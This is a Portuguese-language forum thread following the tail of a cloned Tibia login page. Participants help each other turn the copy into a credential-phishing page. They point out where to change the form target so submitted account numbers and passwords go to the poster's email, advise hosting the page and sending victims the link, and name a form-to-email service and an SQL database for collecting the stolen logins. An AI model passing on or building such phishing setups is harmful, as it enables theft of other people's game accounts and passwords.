<td bgcolor=#000000 background="http://static.tibia.com/IMAGES/GLOBAL/paper_bottom.gif" width=100% valign=top>
<img src="http://static.tibia.com/IMAGES/GLOBAL/blank.gif" width=1 height=16 border=0></td>
<td bgcolor=#000000 background="http://static.tibia.com/IMAGES/GLOBAL/paper_bottomright.gif" valign=top>
<img src="http://static.tibia.com/IMAGES/GLOBAL/blank.gif" width=12 height=16 border=0 vspace=0></td>
</tr></table></td>

<td bgcolor=black width=5%><img src="http://static.tibia.com/IMAGES/GLOBAL/blank.gif" width=1 height=1 border=0></td>
</tr></table>


</body>
</html>


Nessa pagina eh onde as pessoas colocam suas senha e apertam submit para enviar...ai eu keria sabe onde tenhu q substui e bota meu e-mail ex: [ darkingman_666@hotmail.com

Vlws =]

_w4nKSt4_

Caro jonatas_666,
Por favor, LEIA o tutorial..Assim vc nao precisaria fazer essa pergunta...

Fvox

@jonatas_666

Realmente,

LEIA o tutorial

Para de guilds seria uma coisa mais pra php.. para aparecer que o cara está invitado né !
"Achas que estás caindo na insanidade? Mergulhe."


Anonymous

so totalmente novato !!!

tah fiz tudo como ele falo mas como eu salvo  ???

kmrafa

apesar de estar bem explicado jonatas...se muda aki neh

http://www.tibia.com/community/?subtopic=guilds" METHOD=post>
     
       
       
     
Account number:
Password:



@fodao

tu tem que hospedar em aglum lugar... e manda o link para as pessoas..mais plis sem perguntas desse tipo aqui...já tem um monte..qlq coisa www.google.com.br em 10 segundos vc descobre a sua duvida...procure por como hospedar, ftp essas coisas..servidor ...blz

Anonymous

vlw

eu nao gosto de usa o google pq ainda so iniuciante em mexer em pc

ganhei o meu faz 3 meses

fico com receio dos virus  :-\

Fvox

Quote from: "Fodao"vlw

eu nao gosto de usa o google pq ainda so iniuciante em mexer em pc

ganhei o meu faz 3 meses

fico com receio dos virus  :-\

uashashuahsausas.

baixa algumas ferramentas de segurança (firewall, anti-spyware) e um bom anti-virus, como o kaspersky e o nod32
"Achas que estás caindo na insanidade? Mergulhe."



Anonymous

tutorial muito bom......por acaso ja tentei fazer algo do genero (mas criando a minha propria pagina, estilo formulario, com varios campos pros utilizadores preencherem), mas como nao tinha nenhum host que envia se mails (os que vi tinha que pagar), fiz com que os dados ficassem numa Base de dados SQL ..... tambem funciona... ;)

Anonymous

Pena que este servidor http://free4web.pl/Form2Mail/   não sei porque não esta funcionando mais, ao invés de enviar para o email ele ta dando uma mensagem que não tenho a minima ideia de qual mensagem é porque esta em uma linguagem diferente (acho que é polones).
Se alguem souber de outro servidor que faça o mesmo que esse passe ai.
te +  ;)